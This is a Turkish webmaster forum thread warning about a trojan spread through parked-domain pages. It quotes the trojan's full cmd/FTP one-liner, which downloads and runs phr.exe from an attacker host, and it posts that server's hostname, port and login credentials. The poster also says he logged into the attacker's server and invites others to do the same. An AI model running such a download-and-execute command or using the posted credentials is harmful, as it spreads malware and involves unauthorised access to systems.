İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Milleti sömüren Trojanın ftp adresini veriyorum

sistem

0
İyinet Üyesi
Katılım
8 Temmuz 2005
Mesajlar
264
Reaction score
0
Konum
istanbul
Adam Domainini Park ediyor, Park Eden Trojan için kullanıyor :mad:
Trojanın kullandıgı Ftp adresini ve kime ait oldugunu bulup ( şifreleriyle beraber )
ftp adresine baglandım ve içine malum bir küfür dökümanı braktım .

Kardeşim Domain adınızı park etmeyin. güvenmediğiniz yerlerden Host almayın
Dns adınızı alt domainle böyle işler için kullanırlar.

virus yada trojan web sayfasından bulaşıyor bu domain park edildi flan falan yazan yerden :D .

avg bir tanesini tanıdı . digerini tanımıyor. (phr.exe dosyasını açmayın tanımıyor)

kullandıgı bir cok domain var bu 1 tanesi
isteyen girip trojanı incelesin ;)

domain : phr3akftp.DARKSENSUI.INFO
kullandığı port : 612 - ftp için
kullanıcı : phr
şifresi : klopklop

Trojan virüsünün kullandıgı komut :


Kod:
cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
domain sahipleri başka başka biri ingilterede . biri new york dışında domain sahiplerinin bir suçu oldugunu sanmıyorum kanımca dns server kimin elinde ise o yapıyor bunları.

Bu domain' in name serverleri bunlar kimdir nedir bilen buraya yazıversin
benim hiç işim olmadı bu serverle tanımam
Name Server:pARK5.SECURESERVER.NET
Name Server:pARK6.SECURESERVER.NET

biraz karışık bir yazı oldu bir yandan trojanla kovalaşıyoz
 

sistem

0
İyinet Üyesi
Katılım
8 Temmuz 2005
Mesajlar
264
Reaction score
0
Konum
istanbul
Kısacası bu trojan sizin le ilgili bilgileri yukarda verdiğim ftp adresine gönderiyor.

sisteminizden silemeseniz bile FTP.exe dosyasını silin yada adını değiştirin kullanamasın . en azından dışarı bilgileriniz gitmez.
yeni leride gelmez.
 

uyuz

0
İyinet Üyesi
Katılım
31 Aralık 2003
Mesajlar
2,515
Reaction score
0
o nameserverlar godaddynin default parking nameserverları :)
 

sistem

0
İyinet Üyesi
Katılım
8 Temmuz 2005
Mesajlar
264
Reaction score
0
Konum
istanbul
yapmaya :confused:

vay bee...

phr3akftp.DARKSENSUI.INFO

sorguları

DNS Lookup: phr3akftp.DARKSENSUI.INFO A record

Domain Type Class TTL Answer
phr3akftp.darksensui.info. A IN 3600 205.177.73.31
phr3akftp.darksensui.info. A IN 3600 205.177.75.121
darksensui.info. NS IN 3600 PARK5.SECURESERVER.NET.
darksensui.info. NS IN 3600 PARK6.SECURESERVER.NET.


WHOIS results for 205.177.73.31
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst